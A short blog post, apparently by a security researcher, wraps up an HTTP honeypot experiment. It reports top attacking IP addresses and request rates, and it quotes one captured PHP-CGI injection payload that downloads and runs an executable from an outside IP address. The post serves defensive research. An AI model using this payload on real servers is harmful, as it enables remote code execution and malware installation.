HTTP Honeypot experiment
- Matei
- Jan 21, 2025
- 1 min read
I've closed our little HTTP Honeypot experiment. Since our last report, we had an additional spike, and got some very interesting new payloads in our wordlists such as: /cgi-bin/php-cgi.exe?arg=%0aContent-Type:%20text/plain%0a%0a<?php%20system('curl%20-L%20-k%20-O%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe%20%7C%7C%20wget%20--no-check-certificate%20http%3A%2F%2F23.27.51.244%2Fdr0p.exe%20%26%26%20.%2Fdr0p.exe');?>.Â
Check out a JoeSandbox report for the EXE which was attempted to be dropped using the payload from above:Â https://lnkd.in/dwegSJ-2
Check out the project on GitHub, including our updated wordlist:Â https://lnkd.in/dTvMKMCR
Check out our draft report from last week on the HiveHack page: https://lnkd.in/dJ6SuhQk
Some additional data:
Top 10 IPs with the highest count:
IP
146.235.220[.]43Â Â 7112
173.249.10[.]225Â Â 7111
43.134.58[.]129Â Â Â 1130
213.136.70[.]28Â Â Â 476
213.136.86[.]62Â Â Â 159
101.32.192[.]203Â Â Â 125
156.146.36[.]72Â Â Â Â 81
217.15.164[.]190Â Â Â 77
78.153.140[.]158Â Â Â 48
78.153.140[.]156Â Â Â 45
Average number of requests per hour: 57.99
PS: I am going to publish some more complex honeypots in the future. I would like to publish this one again, but I am seeking your advice on how to get more humans to interact with it. There are some ideas for next steps in the draft report, but I would appreciate your feedback!
